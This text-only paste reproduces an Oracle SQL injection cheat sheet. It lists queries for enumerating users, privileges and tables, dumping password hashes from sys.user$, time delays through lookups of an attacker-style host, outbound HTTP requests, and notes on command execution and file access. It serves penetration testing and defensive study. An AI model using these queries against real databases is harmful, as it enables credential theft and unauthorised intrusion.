Oracle SQL Injection Cheat Sheet


SUBMITTED BY: Guest

DATE: Nov. 26, 2013, 10:12 a.m.

FORMAT: Text only

SIZE: 5.3 kB

HITS: 2379

  1. Oracle SQL Injection Cheat Sheet
  2. Some useful syntax reminders for SQL Injection into Oracle databases…
  3. This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet.
  4. [Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the query.]
  5. Get Version Information:
  6. SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’;
  7. SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’;
  8. SELECT version FROM v$instance;
  9. How to Use Comments:
  10. SELECT 1 FROM dual — comment here
  11. – NB: SELECT statements must have a FROM clause in Oracle so we have to use the dummy table name ‘dual’ when we’re not actually selecting from a table.
  12. Get Current User's Username:
  13. SELECT user FROM dual
  14. Enumerate / List Users:
  15. SELECT username FROM all_users ORDER BY username;
  16. SELECT name FROM sys.user$; — priv
  17. List Password Hashes:
  18. SELECT name, password, astatus FROM sys.user$ — priv, <= 10g. astatus tells you if acct is locked
  19. SELECT name,spare4 FROM sys.user$ — priv, 11g
  20. List Privileges:
  21. SELECT * FROM session_privs; — current privs
  22. SELECT * FROM dba_sys_privs WHERE grantee = ‘DBSNMP’; — priv, list a user’s privs
  23. SELECT grantee FROM dba_sys_privs WHERE privilege = ‘SELECT ANY DICTIONARY’; — priv, find users with a particular priv
  24. SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;
  25. List DBA Accounts:
  26. SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’; — priv, list DBAs, DBA roles
  27. Current Database:
  28. SELECT global_name FROM global_name;
  29. SELECT name FROM v$database;
  30. SELECT instance_name FROM v$instance;
  31. SELECT SYS.DATABASE_NAME FROM DUAL;
  32. List Databases:
  33. SELECT DISTINCT owner FROM all_tables; — list schemas (one per user)
  34. – Also query TNS listener for other databases. See tnscmd (services | status).
  35. List Columns:
  36. SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’;
  37. SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’;
  38. List Tables:
  39. SELECT table_name FROM all_tables;
  40. SELECT owner, table_name FROM all_tables;
  41. Find Tables From Column Name:
  42. SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’; — NB: table names are upper case
  43. Select Nth Row:
  44. SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — gets 9th row (rows numbered from 1)
  45. Select Nth Char:
  46. SELECT substr(‘abcd’, 3, 1) FROM dual; — gets 3rd character, ‘c’
  47. Bitwise AND:
  48. SELECT bitand(6,2) FROM dual; — returns 2
  49. SELECT bitand(6,1) FROM dual; — returns0
  50. ASCII Value -> Char:
  51. SELECT chr(65) FROM dual; — returns A
  52. Char -> ASCII Value:
  53. SELECT ascii(‘A’) FROM dual; — returns 65
  54. Casting:
  55. SELECT CAST(1 AS char) FROM dual;
  56. SELECT CAST(’1′ AS int) FROM dual;
  57. String Concatenation:
  58. SELECT ‘A’ || ‘B’ FROM dual; — returns AB
  59. If Statement:
  60. BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; — doesn’t play well with SELECT statements
  61. Case Statement:
  62. SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — returns 1
  63. SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — returns 2
  64. Avoiding Quotes:
  65. SELECT chr(65) || chr(66) FROM dual; — returns AB
  66. Time Delay:
  67. BEGIN DBMS_LOCK.SLEEP(5); END; — priv, can’t seem to embed this in a SELECT
  68. SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — if reverse looks are slow
  69. SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual; — if forward lookups are slow
  70. SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; — if outbound TCP is filtered / slow
  71. – Also see Heavy Queries to create a time delay
  72. Make DNS Requests:
  73. SELECT UTL_INADDR.get_host_address(‘google.com’) FROM dual;
  74. SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual;
  75. Command Execution:
  76. Javacan be used to execute commands if it’s installed.ExtProc can sometimes be used too, though it normally failed for me. :-(
  77. Local File Access:
  78. UTL_FILE can sometimes be used. Check that the following is non-null:
  79. SELECT value FROM v$parameter2 WHERE name = ‘utl_file_dir’;Java can be used to read and write files if it’s installed (it is not available in Oracle Express).
  80. Hostname, IP Address:
  81. SELECT UTL_INADDR.get_host_name FROM dual;
  82. SELECT host_name FROM v$instance;
  83. SELECT UTL_INADDR.get_host_address FROM dual; — gets IP address
  84. SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — gets hostnames
  85. Location of DB files SELECT name FROM V$DATAFILE;
  86. Default/System Databases:
  87. SYSTEM
  88. SYSAUX

comments powered by Disqus